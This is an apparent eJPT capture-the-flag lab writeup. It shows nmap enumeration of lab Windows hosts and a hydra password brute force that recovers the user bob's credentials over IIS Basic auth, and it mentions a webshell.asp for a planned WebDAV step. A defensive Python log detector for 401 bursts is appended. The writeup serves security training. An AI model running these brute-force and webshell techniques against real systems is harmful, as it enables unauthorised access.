Welcome to the first System-Host Based Attacks CTF 1 lab writeup for the eJPT. Let’s get started!
Attacking IP: 10.10.48.2
Target IPs: target1.ine.local - 10.3.16.216
target2.ine.local - 10.3.18.42
Below are wordlists recommended by the lab we use for our tasks.
/usr/share/metasploit-framework/data/wordlists/common_users.txt,
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp
Let’s run our nmap scan and start our enumeration. The scan below shows a few open ports on this target. Given the first task, I’m willing to bet that the user bob is associated with one of these open services. Let’s check out the web service on port 80 and see if we can find a login portal.
```
nmap -sV -sC 10.3.16.216
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-10 03:22 IST
Nmap scan report for target1.ine.local (10.3.16.216)
Host is up (0.0027s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=target1.ine.local
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-09T21:52:17+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-JVD17HK
| Not valid before: 2026-01-08T21:44:55
|_Not valid after:  2026-07-10T21:44:55
| rdp-ntlm-info:
|   Target_Name: EC2AMAZ-JVD17HK
|   NetBIOS_Domain_Name: EC2AMAZ-JVD17HK
|   NetBIOS_Computer_Name: EC2AMAZ-JVD17HK
|   DNS_Domain_Name: EC2AMAZ-JVD17HK
|   DNS_Computer_Name: EC2AMAZ-JVD17HK
|   Product_Version: 10.0.17763
|_  System_Time: 2026-01-09T21:52:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-09T21:52:10
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
```
Sure enough, if we go to the target1.ine.local URL we find a login portal that will probably accept our username. I bet we can use hydra to brute force a password. Something else to note: when we see a Microsoft IIS service running on port 80, we should consider what could be behind it. There could be WebDAV, a web portal, default directories, or other possibilities. In this lab’s case it’s going to be WebDAV, but we need to test that to be sure.
Important Note: It’s easy to follow walkthroughs like this, where most of the time we’re guided down the only solution that works and don’t see all the failed options tried by the user practicing the lab, so keep this in mind as you build your skills. Try to give your brain a fair chance at recalling what you’ve studied already to build that muscle memory. That will help you become a stronger hacker.
```
hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get
[80][http-get] host: target1.ine.local login: bob password: password_123321
```
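From the defender's side, a password-guessing run like the one above shows up in the IIS W3C access log as a burst of 401 responses from one client, followed by a 200 once a guess succeeds. The following is an added example, not part of the original lab or writeup; the log lines are constructed, the field set is a simplified subset of a real IIS log, and the threshold and window values are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C log sample (not lab output): a 401 burst, then a 200.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2026-01-09 21:55:01 GET / - 10.10.48.2 401
2026-01-09 21:55:01 GET / - 10.10.48.2 401
2026-01-09 21:55:02 GET / - 10.10.48.2 401
2026-01-09 21:55:02 GET / - 10.10.48.2 401
2026-01-09 21:55:03 GET / - 10.10.48.2 401
2026-01-09 21:55:03 GET / bob 10.10.48.2 200
2026-01-09 21:58:40 GET / - 10.10.99.7 401
2026-01-09 22:10:12 GET / alice 10.10.99.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                          "%Y-%m-%d %H:%M:%S")
            yield row

def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Alert on clients with >= threshold 401s inside a sliding window."""
    recent = defaultdict(deque)  # c-ip -> timestamps of recent 401 responses
    alerts = {}                  # c-ip -> alert record
    for row in parse_w3c(text):
        ip, ts, status = row["c-ip"], row["ts"], row["sc-status"]
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()          # forget failures older than the window
        if status == "401":
            q.append(ts)
            if len(q) >= threshold:
                alert = alerts.setdefault(
                    ip, {"ip": ip, "failures": 0, "compromised_user": None})
                alert["failures"] = max(alert["failures"], len(q))
        elif status == "200" and ip in alerts and q:
            # A success straight after a failure burst: the guess likely worked.
            alerts[ip]["compromised_user"] = row.get("cs-username")
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

A single 401 followed much later by a 200, as with the second client in the sample, is normal Basic-auth behaviour and is not flagged.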